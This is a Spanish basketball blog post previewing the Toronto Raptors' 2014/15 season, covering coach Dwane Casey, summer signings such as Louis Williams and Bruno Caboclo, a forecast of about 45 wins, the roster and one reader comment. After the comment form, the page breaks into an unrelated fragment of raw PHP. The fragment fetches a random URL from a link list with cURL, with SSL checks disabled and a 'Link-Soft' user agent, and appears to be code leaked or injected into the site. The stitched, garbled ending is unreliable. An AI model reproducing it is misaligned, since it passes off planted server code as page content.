Toronto Raptors 2014/2015: Y la nave va…

17 de October de 2014 por Nacho

…algo que suele pasar cuando el mando lo tiene el capitán y no la tripulación. Dwane Casey ha demostrado, tanto en el juego del equipo como en los resultados, que es un director excepcional. El año pasado, contra todo pronóstico y más aún tras la venta de Rudy Gay, lograron su mejor registro en temporada regular y consiguieron su segundo título de división. Los años del jugador franquicia pasaron: Bosh abandonó la nave, Bargnani nunca lo fue… Ahora vienen los años de un señor equipo.

Movimientos clave

La profundidad de una plantilla suele ser clave para dosificar los minutos de tus titulares y ampliar tus armas de juego, y dotar de profundidad al equipo ha sido precisamente lo que ha hecho Masai Ujiri este verano. Interesante porque el equipo ha dejado de ser sorpresa y ya se le espera entre los favoritos de la conferencia. Si lo que se está vislumbrando este pretemporada se mantiene, la llegada de Louis Williams, que recuerda por momentos al jugador de los Sixers, aportará poder anotador desde el banco.  Ha llegado de los Hawks con un solo año de contrato lo que supone una gran apuesta de la que pueden salir equipo y jugador beneficiados.En el mismo traspaso recalaron en Toronto los derechos de  Lucas Nogueira que, una vez firmado y junto a otro recién llegado como Greg Stiemsma, dará descanso a Valanciunas. Para potenciar las alas llegan Jordan Hamilton, James Johnson (esperemos que centrado después de su arresto por violencia doméstica el mes de julio) y la gran sorpresa del draft de 2014, el brasileño Bruno Caboclo, verde, verdísimo pero con unas condiciones físicas impresionantes.

 Qué esperamos de ellos

Ante todo que mantengan el espíritu de equipo que les llevó a lo más alto el año pasado. Casey va a tener que controlar las individualidades que puedan surgir y hacer que sumen al equipo. Son muchas y por diferentes motivos: Kyle Lowry querrá demostrar que,a pesar de no ser invitado el año pasado, es un jugador All Star, Demar DeRozan no querrá bajarse de la nube tras su presencia en el All Star y el mundobasket, para Terrence Ross es el año de la confirmación… Y luego hay varios jugadores en último año de contrato: Louis Williams, como ya comentábamos antes, Amir Johnson, Landry Fields (¿qué fue del jugador que enamoró a Spike Lee?), Chuck Hayes y Tyler Hansbrough.

Atentos a los movimientos en torno al All Star porque tienen expirings interesantes que ofrecer en busca de un jugador de nivel.

Pronóstico

En torno a las 45 victorias, luchando por ventaja de campo en PO. Segunda Ronda según cruces.

Plantilla

PG: Kyle Lowry, Greivis Vasquez, Will Cherry (R)
SG: DeMar DeRozan, Louis Williams.
SF: Terrence Ross, Landry Fields, James Johnson, Bruno Caboclo (R), Jordan Hamilton.
PF: Amir Johnson, Patrick Patterson, Tyler Hansbrough, Chuck Hayes.
C: Jonas Valanciunas, Lucas Nogueira (R), Greg Stiemsma.

Comenta

Un comentario a esta entrada

  1. TheDeerHunter dice:
    #1

    Es un equipo joven, con recorrido. Las incorporaciones y los objetivos marcados pueden saber a poco, aunque no podemos olvidar cual era el panorama cuando se deshicieron de Gay. Personalmente pensaba que se trataba de tankeo puro y duro.
    Un toque de veteranía y desarrollo a este grupo les puede venir francamente bien para orientar el proyecto hacia palabras mayores y quizá hasta convertirse en un gallo de la conferencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>